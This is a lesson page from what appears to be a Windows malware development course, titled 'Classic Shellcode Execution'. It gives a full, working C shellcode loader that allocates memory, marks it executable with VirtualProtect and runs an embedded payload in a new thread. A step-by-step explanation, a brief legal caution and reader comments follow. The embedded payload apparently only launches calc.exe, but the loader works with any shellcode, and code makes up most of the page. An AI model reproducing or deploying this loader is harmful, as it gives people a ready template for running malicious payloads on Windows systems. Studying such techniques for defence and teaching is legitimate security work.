Classic Shellcode Execution

Transcription

Extra Support Audio


#include &lt;windows.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

unsigned char shellcode[] = {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
    0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
    0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
    0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
    0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
    0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
    0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
    0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
    0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
    0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
    0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
    0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
    0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
    0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
    0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
    0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
    0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
    0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
    0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
    0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
    0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
    0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
    0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
unsigned int payloadLen = sizeof(shellcode);

int main(void) {
  void * memoryBuffer; // pointer to memory buffer
  BOOL rv; // return value
  HANDLE th; // thread handle
  DWORD oldprotect = 0; // old protection

  // Allocate a memory buffer for payload
  memoryBuffer = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

  // Copy payload to memory buffer
  RtlMoveMemory(memoryBuffer, shellcode, payloadLen);

  // make new buffer as executable
  rv = VirtualProtect(memoryBuffer, payloadLen, PAGE_EXECUTE_READ, &amp;oldprotect);
  if ( rv != 0 ) {
    // run payload
    th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) memoryBuffer, 0, 0, 0);
    WaitForSingleObject(th, -1);
  }
  return 0;
}

This code appears to be a C/C++ program that executes shellcode in memory on a Windows system. Let’s break down the key components and explain its functionality:

Shellcode:
- The unsigned char shellcode[] array contains the shellcode in hexadecimal representation. Shellcode is typically a small piece of code that performs specific actions when executed, often associated with malicious activities or penetration testing.
Memory Allocation:
- The program allocates memory using the VirtualAlloc function. It reserves and commits a region of memory for the shellcode using the MEM_COMMIT | MEM_RESERVE flags and sets the memory protection to PAGE_READWRITE.
Copying Shellcode:
- The RtlMoveMemory function is used to copy the shellcode into the allocated memory buffer.
Memory Protection:
- The program changes the memory protection of the allocated buffer to PAGE_EXECUTE_READ using VirtualProtect. This allows the memory to be executable.
Thread Creation:
- It creates a new thread using the CreateThread function. The thread’s entry point is set to the address of the memoryBuffer where the shellcode is loaded. This effectively starts the execution of the shellcode.
Waiting for Thread Completion:
- The program then waits for the thread to finish its execution using WaitForSingleObject. The -1 parameter makes it wait indefinitely until the thread completes.
Cleanup and Termination:
- Finally, the program returns 0, indicating successful execution.

It’s important to note that this code appears to execute shellcode, which can have both legitimate and malicious use cases. In ethical hacking and penetration testing, it can be used to test the security of a system by simulating potential attacks. However, in malicious contexts, shellcode is often used to exploit vulnerabilities and compromise systems.

Please exercise caution when working with such code, and ensure that you have appropriate permissions and legal authorization for its use.

2 responses to “Classic Shellcode Execution”

buttbundy says:

November 8, 2025 at 10:04 am

Very well explained! And I really love the extra support audio too!

Log in to Reply
- s12offsec says:
  
  November 8, 2025 at 12:02 pm
  
  Thank you!!
  
  Log in to Reply

Introduction Windows Malware Development

Curriculum

Classic Shellcode Execution

2 responses to “Classic Shellcode Execution”

Leave a Reply Cancel reply

Modal title